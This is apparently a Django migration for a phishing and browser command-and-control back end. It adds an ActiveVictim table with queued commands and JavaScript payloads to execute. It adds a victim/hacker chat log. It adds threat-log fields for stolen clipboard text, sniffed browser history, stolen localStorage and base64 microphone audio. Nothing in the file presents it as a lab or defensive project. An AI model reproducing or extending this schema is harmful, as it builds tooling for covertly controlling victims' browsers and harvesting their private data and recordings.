# Generated by Django 6.0.4 on 2026-05-05 05:08

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('logger', '0007_activephishtemplate'),
    ]

    operations = [
        migrations.CreateModel(
            name='ActiveVictim',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('session_id', models.CharField(max_length=255, unique=True)),
                ('ip_address', models.GenericIPAddressField()),
                ('last_seen', models.DateTimeField(auto_now=True)),
                ('device_info', models.TextField(blank=True, null=True)),
                ('pending_command', models.CharField(blank=True, help_text='Command to execute', max_length=50, null=True)),
                ('command_payload', models.TextField(blank=True, help_text='Data for the command (e.g. JS code to execute)', null=True)),
            ],
        ),
        migrations.CreateModel(
            name='LiveChatLog',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('session_id', models.CharField(max_length=255)),
                ('sender', models.CharField(choices=[('victim', 'Victim'), ('hacker', 'Hacker')], max_length=10)),
                ('message', models.TextField()),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.AddField(
            model_name='threatlog',
            name='clipboard_data',
            field=models.TextField(blank=True, help_text='Stolen clipboard text', null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='history_data',
            field=models.TextField(blank=True, help_text='Sniffed browser history', null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='local_storage_data',
            field=models.TextField(blank=True, help_text='Stolen localStorage', null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='voice_audio',
            field=models.TextField(blank=True, help_text='Base64 encoded audio from mic', null=True),
        ),
    ]
